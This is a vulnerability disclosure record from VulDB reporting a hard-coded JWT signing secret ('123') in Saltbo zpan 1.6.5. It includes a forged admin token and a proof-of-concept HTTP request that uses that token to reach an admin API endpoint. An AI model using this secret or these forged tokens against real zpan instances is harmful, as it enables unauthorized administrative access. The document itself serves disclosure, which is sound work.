| Title | Saltbo zpan 1.6.5 Hard-coded Credentials |
|---|
| Description | # Summary
A critical security vulnerability has been identified in Saltbo/zpan v1.6.5, where the system uses a hardcoded JWT (JSON Web Token) secret key "123" for token signing. This implementation flaw allows attackers to forge valid authentication tokens, bypassing security controls and gaining unauthorized access to any zpan instance running this version.
# Details
The vulnerability stems from the use of a static HMAC-SHA512 (HS512) secret key ("123") for JWT signing in the z-token authentication mechanism.
**Algorithm:** HS512 (HMAC-SHA512)
**Hardcoded Secret Key:** 123
**Sample Admin JWT Token:**
eyJhbGciOiJIUzUxMiIsInR5cCI6IkpXVCJ9.eyJhdWQiOiJ6cGxhdFVzZXJzIiwiZXhwIjoxNzUyMTQwMTkxLCJpYXQiOjE3NTE1MzUzOTEsImlzcyI6InpwbGF0IiwibmJmIjoxNzUxNTM1MzkxLCJzdWIiOiIxIiwicm9sZXMiOlsiYWRtaW4iXX0.lhYjZpv4PAZSeq2zaLJDSgXvV5Lef2sArafHA2PQnTCeeUDT0yvPkG3qv5axKLBj-AeeAjWz3Y57_rrTavP4g
# POC
```
GET /api/system/options/core.email HTTP/1.1
Host: target-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/x.x.x.x Safari/537.36
Accept: application/json, text/plain, */*
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: z-token=eyJhbGciOiJIUzUxMiIsInR5cCI6IkpXVCJ9.eyJhdWQiOiJ6cGxhdFVzZXJzIiwiZXhwIjoxNzUyMTQwMDg5LCJpYXQiOjE3NTE1MzUyODksImlzcyI6InpwbGF0IiwibmJmIjoxNzUxNTM1Mjg5LCJzdWIiOiIxIiwicm9sZXMiOlsiYWRtaW4iXX0.a_B2Kzq9ZIi3-kqz0VcIsqX39Abn_Je2TUl_gt67ZkpbKt31hwa-vvrS9H2LIw2n7TmJwtk59tmsVkk9wQiZxQ;
Connection: keep-alive
``` |
|---|
| Source | ⚠️ https://github.com/saltbo/zpan/issues/219 |
|---|
| User | jiashenghe (UID 39445) |
|---|
| Submission | 07/03/2025 12:07 (12 months ago) |
|---|
| Moderation | 07/11/2025 10:50 (8 days later) |
|---|
| Status | Accepted |
|---|
| VulDB entry | 316097 [saltbo zpan up to 1.6.5/1.7.0-beta2 JSON Web Token token.go NewToken hard-coded password] |
|---|
| Points | 20 |
|---|